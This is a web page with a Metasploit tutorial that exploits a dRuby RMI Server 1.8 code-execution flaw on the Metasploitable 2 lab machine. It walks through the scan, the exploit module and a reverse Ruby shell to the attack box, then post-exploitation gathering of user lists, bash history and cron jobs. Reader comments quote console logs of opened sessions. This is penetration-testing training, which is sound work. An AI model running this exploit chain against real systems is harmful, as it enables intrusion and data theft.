• Home
  • About Us
  • General
  • Wireless
  • Web
  • Scanning
  • Metasploit
  • Hacking Courses
    • OSCP
    • The Virtual Hacking Labs
    • Certified Ethical Hacker (CEH)
    • Hacking Books
  • More
    • Exploit tutorials
    • Pentesting Exchange
    • Networking
    • Malware Analysis
    • Hacking Metasploitable 2/3
    • Digital Forensics
  • Contact
Facebook Twitter Instagram
Trending
  • CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability
  • Installing Rogue-jndi on Kali Linux
  • Log4Shell VMware vCenter Server (CVE-2021-44228)
  • The Great Leak: Microsoft Exchange AutoDiscover Design Flaw
  • CVE-2019-19781: Citrix ADC RCE vulnerability
  • Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations
  • Vulnerability Scanning with OpenVAS 9 part 3: Scanning the Network
  • Vulnerability Scanning with OpenVAS 9 part 2: Vulnerability Scanning
Facebook Twitter YouTube Tumblr Instagram Pinterest
Hacking Tutorials
  • Home
  • About Us
  • General
  • Wireless
  • Web
  • Scanning
  • Metasploit
  • Hacking Courses
    • OSCP
    • The Virtual Hacking Labs
    • Certified Ethical Hacker (CEH)
    • Hacking Books
  • More
    • Exploit tutorials
    • Pentesting Exchange
    • Networking
    • Malware Analysis
    • Hacking Metasploitable 2/3
    • Digital Forensics
  • Contact
Hacking Tutorials
You are at:Home » Metasploit Tutorials » Hacking dRuby RMI Server 1.8
hacking-druby-rmi-server

Hacking dRuby RMI Server 1.8

13
By Hacking Tutorials on October 8, 2016 Metasploit Tutorials

In this tutorial we will be hacking dRuby using a remote code execution vulnerability in the dRuby RMI server that is running on Metasploitable 2. dRuby is a distributed object system for Ruby and is written in Ruby. dRuby uses its own protocol and binds itself to a URI such as druby://example.com on port 8787. By default port 8787 is not scanned by Nmap since it is not included in the list of 1.000 common ports which are scanned by default when no additional port options are specified. Open port 8787 on Metasploitable 2 would remain unnoticed unless we would be using the -p- flag to scan all 65535 ports or use a port range which includes port 8787. This example shows us how important it is to always run a full port scan on a target when performing network enumeration. We could easily be missing crucial information which can be used to compromise the target.

Hacking dRuby RMI Server 1.8 with Metasploit

We will start the dRuby hacking tutorial with scanning port 8787 with Nmap and then we will be performing a vulnerability assessment. Than we will be hacking dRuby RMI server using Metasploit by exploiting the found vulnerabilities. We will conclude this tutorial with a Metasploit post exploitation script to gather information from the compromised system and review the lessons learned.

Nmap scan on port 8787

Let’s run the following command on the console to perform a Nmap Service scan on Metasploitable on port 8787:

nmap -sV [IP] -p8787

hacking dRuby
Nmap portscan on port 8787.

As we already expected port 8787 is open and Ruby DRb RMI server version 1.8 is running on the target host. Let’s see what vulnerabilities are available for this version of distributed Ruby (dRuby) using searchsploit.

Searchsploit dRuby exploits

Let’s try to search the searchsploit database using an exact match search using the -e flag:

searchsploit -e Ruby DRb RMI

exploiting-druby-rmi-server-1-8-2
No results.

The exact match query does not return any results. This means that we have to use a more general search term. We could be removing RMI from the search term and if that does not return any results either, we can just search for Ruby exploits and go through the results one by one. Personally I would suggest to use this approach, where we go from specific search terms to general search terms, when a general search term returns too many results. For example the search term WordPress returns 100’s of results and ‘WordPress 3’ only 9.

When we search Searchsploit for Ruby exploit using the following command we are presented with less than 30 results:

searchsploit ruby

exploiting-druby-searchsploit
Search results for ruby in searchsploit.

When we go through the list of exploits we can see 2 exploits for Distributed Ruby that are worth to further examine. Let’s narrow the results by searching for ‘Distributed Ruby’:

exploiting-druby-rmi-server-1-8-4
Distributed Ruby exploits.

Remember to put in the -e flag in our command to only show results that have a direct match with this search term. Let’s check out the Distributed Ruby Send instance_eval/syscall Code Execution exploit. When we use the following command we can get some additional information about the explout and the path to the exploit is copied to the clipboard:

searchsploit -p 17058

exploiting-druby-rmi-server-1-8-5
Copy the path to the exploit to the clipboard.

Next we can check the file contents using the following command:

cat /usr/share/exploitdb/platforms/linux/remote/17058.rb

exploiting-druby-rmi-server-1-8-exploit

Metasploit: hacking dRuby RMI server 1.8

We can see that we’re dealing with a Metasploit exploit here. Let’s fire up Metasploit and search for the exploit there. Run the following command to start the msfconsole:

msfconsole

Since we know the name of the exploit we can search only the name field using the following command:

search name:Distributed Ruby Send instance_eval/syscall Code Execution

exploiting-druby-rmi-server-1-8-metasploit
Distributed Ruby Send instance_eval/syscall Code Execution

And then select the exploit using the use command:

use exploit/linux/misc/drb_remote_codeexec

Let’s set a Ruby reverse shell payload for this exploit first using the following command:

set payload cmd/unix/reverse_ruby

Use the options command to show the available options for this exploit:

options

exploiting-druby-rmi-server-1-8-Metasploit-exploit-options
Exploit options.

Next we need to set the LHOST for the payload:

set LHOST [IP attack box]

And we set the URI using the following command (the expected format is mentioned in the description):

set URI druby://[Target IP]:8787

The listening port can be left as is. All that remains now is running the exploit using the exploit command and if everything is done correctly a reverse shell with root privileges is returned to the attack box:

exploiting-druby-rmi-server-1-8-rootshell
Root shell!

Post exploitation information gathering

Let’s go one step further and have a look at one of the post exploitation/information gathering modules available for Linux, the enum_system module. We can select this module by backgrounding the command shell session 1 using CTRL + Z. It will than ask us to background the current session, confirm with ‘y’.

exploiting-druby-rmi-server-1-8-background-session
Press y to background the session.

Next select the enum_system module using the following command:

use enum_system

Or:

use post/linux/gather/enum_system

Type the info command to see what this module exactly does:

exploiting-druby-rmi-server-1-8-11
Use the info command for a module description.

The description tells us that the modules gathers system information such as installed packages, installed services, mount information, user list, user bash history and cron jobs.

To run this post gather module we need to point the module to the active session by using the following command:

set session 1

Now type run to execute the module:

run

exploiting-druby-rmi-server-1-8-post-exploitation
Post exploitation/information gathering module finished successfully.

We can see that all information is downloaded to our attack box and stored at the following location:

/root/.msf4/loot/

To examine the files you can just simply cd to the location and cat the contents of the text files to the console.

Virtual Hacking Labs - Penetration testing lab

Lessons learned

In this exploiting tutorial we have learned a few important things when penetration testing. Let’s review the lessons learned in this Hacking Tutorial.

Scan all ports

The first thing we’ve learned is that we need to scan all available ports on a traget host when performing a penetration test. When we’re running the default NMap port scans only the top 1000 ports are scanned. In this tutorial we’ve compromised a host using a service running on a port which was not in NMap’s default port list.

Search exploits in an effective and efficient way

We’ve also learned how to use searchsploit effectively when too many results are returned or none. A good approach when a general search term returns to many results is to go from very specific to more general search terms. Very specific could be the service name including the version number and a more general search term could be only the service name. In this tutorial the search term ‘Ruby DRB RMI’ didn’t return any results but ‘Distributed Ruby’ got us the results we were looking for.

Post information gathering and exploitation

Last but not least we have seen a glimpse of one of Metasploit’s post gather modules: enum_system. after hacking dRuby you can download some important information from the compromised host to our attack box using the The enum_system module. Such as log files, setuid/setgid files and services. Post information gathering and exploitation is and important part of every penetration test. In this case we got root access to the host on the first reverse shell. More often a privileged shell is returned and post exploitation techniques should be used for privilege escalation. In tutorials to follow we will be going into more details on post exploitation and privilege escalation.

Thank you for reading this tutorial! If you have any questions regarding enumeration, exploitation or post exploitation, do not hesitate to use the comment functionality below and we’ll get back to you as soon as possible. Liked the tutorial? Please share it!

Share on:

  • Email
Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
Previous ArticleHacking Unreal IRCd 3.2.8.1 on Metasploitable 2
Next Article Hacking with Netcat part 1: The Basics

Related Posts

CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability

Installing Rogue-jndi on Kali Linux

Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations

13 Comments

  1. Jason on November 9, 2016 2:21 am

    Wow, very nice Tutorial. Congrats and thanks for sharing !

    Hacking to Learn

    Reply
    • Hacking Tutorials on November 12, 2016 7:57 am

      Thanks Jason!

      If you like this one, you probably like the other tutorials in the Metasploit section as well!

      Reply
  2. timi on November 13, 2016 3:43 am

    It really helped me a lot. Thanks a lot. Can you please tell how this vulnerability can be mitigated. Whether upgrading it to the latest version of Ruby will work?

    Reply
    • Hacking Tutorials on November 14, 2016 9:07 am

      Hi!

      As this is a pretty old version of dRuby RMI server so upgrading will mitigate this vulnerability.

      Reply
  3. Josh on December 22, 2016 8:23 am

    Your tutorials are great, thanks for all this.

    When running this using kali 2.0, everything works as described above. However, I’m encountering an issue trying to do the exact same thing using the rolling kali distribution. I’m hoping you can help me figure out why.

    The exploit is the exact same between the two distributions (I checked), but when instance_eval fails in kali 2016.2, it doesn’t seem to be trying the syscall exploit. I’m hoping you can help me figure out why.

    Here’s what i get:

    msf exploit(drb_remote_codeexec) > run

    [*] Started reverse TCP handler on 192.168.1.99:4444
    [*] Trying to exploit instance_eval
    [-] instance_eval failed due to security error
    [*] Exploit completed, but no session was created.

    Any ideas?

    Thanks again.

    Reply
    • Josh on December 22, 2016 9:15 am

      Disregard. I was looking at the exploitdb code and not the Metasploit module code. Metapsploit in the rolling kali distro uses a different module than in 2.0, which requires choosing between instance_eval and syscall (set target ).

      Reply
  4. Vinit on December 22, 2016 11:43 am

    Getting the following errors
    msf exploit(drb_remote_codeexec) > run

    [*] Started reverse handler on 192.168.184.131:4444
    [*] trying to exploit instance_eval
    [*] instance eval failed, trying to exploit syscall
    [-] Exploit failed: Errno::EINVAL Invalid argument
    [*] Command shell session 1 opened (192.168.184.131:4444 -> 192.168.184.132:51815) at 2016-12-22 16:10:15 +0530

    ^Z
    Background session 1? [y/N] y
    msf exploit(drb_remote_codeexec) > use enum_system
    [-] Failed to load module: enum_system
    msf exploit(drb_remote_codeexec) > use enum_system
    [-] Failed to load module: enum_system

    Reply
    • jb on May 5, 2017 11:12 pm

      i have the same error, write
      use post/linux/gather/enum_system
      instead of use enum_system

      Reply
  5. Vinit on December 22, 2016 11:44 am

    And even this

    msf exploit(drb_remote_codeexec) > set payload cmd/unix/reverse_ruby
    payload => cmd/unix/reverse_ruby
    msf exploit(drb_remote_codeexec) > options
    [-] Unknown command: options.

    Reply
  6. N33B on June 2, 2017 8:29 am

    hey i’m not able to exploit this whenever i try the ports get closed and the service gets changed to mserver or something plz help!!!!!!

    Reply
    • Qais on August 26, 2017 5:09 pm

      same here, also tried with fresh metasploitable2 installation

      Reply
      • Hacking Tutorials on August 27, 2017 11:38 am

        I think this is a bug in the Metasploit module, will have a look at it later to see if there’s an easy fix.

        Reply
  7. Francesco on August 4, 2017 5:30 pm

    Hi and thanks for this tutorial,
    I’ve tried to set up the payload in many different ways, but everytime I get an error of connection refused. In my case I’ve 2 different virtual machines running which have installed Kali linux (IP 192.168.187.128) and metasploitable 2 (IP 192.168.187.131), both of them have a NAT adpter as network interface.
    My physic machine running on IP 192.168.1.105. I’ve tried to set up lhost parameter of the payload with every of that values and also with the public IP of my network.
    Next, the URI is in my case is druby://192.168.187.131:8787 and I’m also sure that the port is open before every test, so what I should set in lhost? I read that it should be the address use by the metasploitable to access to internet, but i’m not sure about the things to do.
    Thanks for help!

    Reply

Leave A Reply Cancel Reply

Top Tutorials
By Hacking TutorialsOctober 29, 20220

CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability

By Hacking TutorialsJanuary 10, 20220

Installing Rogue-jndi on Kali Linux

By Hacking TutorialsDecember 17, 20210

Log4Shell VMware vCenter Server (CVE-2021-44228)

By Hacking TutorialsSeptember 27, 20210

The Great Leak: Microsoft Exchange AutoDiscover Design Flaw

By Hacking TutorialsFebruary 4, 20200

CVE-2019-19781: Citrix ADC RCE vulnerability

By Hacking TutorialsNovember 1, 20188

Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations

Subscribe

Enter your email address to subscribe to Hacking Tutorials and receive notifications of new tutorials by email.

Join 828 other subscribers
Recent Tutorials
  • CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability
  • Installing Rogue-jndi on Kali Linux
  • Log4Shell VMware vCenter Server (CVE-2021-44228)
  • The Great Leak: Microsoft Exchange AutoDiscover Design Flaw
  • CVE-2019-19781: Citrix ADC RCE vulnerability
Virtual Hacking Labs
Penetration Testin Course and Hacking Labs
Categories
  • Digital Forensics
  • Exploit tutorials
  • General Tutorials
  • Hacking Books
  • Hacking Courses
  • Malware Analysis Tutorials
  • Metasploit Tutorials
  • Networking
  • Pentesting Exchange
  • Scanning Tutorials
  • Web Applications
  • Wifi Hacking Tutorials
Downloads
  • directory_scanner.py (120574 downloads)
  • PEiD-0.95-20081103.zip (111427 downloads)
  • wifi_jammer.py (138172 downloads)
Recent Tutorials
  • CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability
  • Installing Rogue-jndi on Kali Linux
  • Log4Shell VMware vCenter Server (CVE-2021-44228)
  • The Great Leak: Microsoft Exchange AutoDiscover Design Flaw
  • CVE-2019-19781: Citrix ADC RCE vulnerability
  • Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations
Popular Tutorials
By Hacking TutorialsSeptember 1, 2016115

Review: Offensive Security Certified Professional (OSCP)

By Hacking TutorialsApril 18, 201738

Exploiting Eternalblue for shell with Empire & Msfconsole

By Hacking TutorialsMarch 17, 201637

Installing VPN on Kali Linux 2016 Rolling

Featured Downloads
  • directory_scanner.py (120574 downloads)
  • PEiD-0.95-20081103.zip (111427 downloads)
  • wifi_jammer.py (138172 downloads)
© Hacking Tutorials 2022

Type above and press Enter to search. Press Esc to cancel.

Go to mobile version